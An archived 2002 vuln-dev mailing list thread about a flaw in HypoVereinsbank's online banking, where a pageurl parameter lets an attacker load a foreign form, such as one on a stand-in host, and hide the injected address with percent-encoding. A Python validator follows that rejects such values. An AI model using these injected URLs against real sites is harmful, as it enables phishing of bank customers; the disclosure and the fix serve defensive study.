Vulnerability Development mailing list archives
Re: security issue at hypovereins bank
From: "Carlos Heller" <carlos.heller () ip-value de>
Date: Sun, 7 Apr 2002 22:52:24 +0200
I discovered two security issues on German online banking systems, and it was hard to find a responsible person. After a lot of expensive phone calls we informed a German newspaper called Express, got 500 bucks cash for the story, and the hole was closed within one day... grin..... cu

(C)arlos Heller
Project Manager
ip value GmbH
Goethering 58
D-63067 Offenbach
Phone: +49 69 800 88 114
Fax: +49 69 800 88 555
Mobile: +49 173 726 0137
premioss - the ip value product suite for network operators

"hnz geeratz[room23]" <staff () room23 org>
05.04.2002 12:12
To: <vuln-dev () securityfocus com>
cc:
Subject: security issue at hypovereins bank

hello

I found this security issue on the German hypovereins bank. They were informed 3 months ago, still nothing has changed. The security hole will allow an attacker to include his own forms in the website. This will give him an option to collect sensitive information. It is a home banking system!

take a look at this (long) URL:

http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu

now it is possible to change the

pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu

part to something like

pageurl=http://www.evol.org/fake_form.php

or try:

http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=http://www.google.de

so it is possible to include everything in this webpage. The attacker could obscure the URL in a form like:

pageurl=h%74t%70%3A%2Fw%77w%77............

so the user will not notice that the included form is not from the original server. It opens a port to a new form of social hacking and data grabbing.

greetings
hnz g
--
hnz geeratz | staff () room23 org
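The fix the quoted report calls for is to stop treating pageurl as a location and instead treat it as a name chosen from the site's own templates. The following Python is added here as an example and is not code from the bank or from either poster; the /pub/ root and the .jsp suffix are assumptions, since the real template's rules are not on the page. It percent-decodes before validating, so the obscured form shown above is rejected exactly like the plain one.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Assumed allowlist: templates live under /pub/ and end in .jsp.
# The real application's layout is not known from the report.
ALLOWED_PREFIX = "/pub/"
ALLOWED_SUFFIX = ".jsp"


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so that
    h%74t%70%3A%2F... is seen as http:/... before any check runs.
    A value that is still changing after max_rounds is refused."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many percent-encoding layers")


def validate_pageurl(raw: str) -> str:
    """Return a normalized site-local template path, or raise ValueError."""
    value = fully_decode(raw)
    # Backslashes and control characters have no place in a template name.
    if any(ord(c) < 0x20 or c == "\\" for c in value):
        raise ValueError("illegal characters in pageurl")
    # Any scheme or authority (http://..., //host/...) points off-site.
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        raise ValueError("external locations are not allowed")
    # Collapse ../ segments, then require the result to stay inside the root.
    normalized = posixpath.normpath(value)
    if not (normalized.startswith(ALLOWED_PREFIX)
            and normalized.endswith(ALLOWED_SUFFIX)):
        raise ValueError("pageurl is outside the template root")
    return normalized


def is_allowed(raw: str) -> bool:
    """Boolean wrapper for use in a request handler or a test."""
    try:
        validate_pageurl(raw)
        return True
    except ValueError:
        return False
```

A stricter variant would map a short token (e.g. an id) to a path via a server-side table, so that no path at all is taken from the request.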
Current thread:
- security issue at hypovereins bank hnz geeratz[room23] (Apr 05)
- Re: security issue at hypovereins bank Dominik Birk (Apr 05)
- <Possible follow-ups>
- Re: security issue at hypovereins bank Carlos Heller (Apr 07)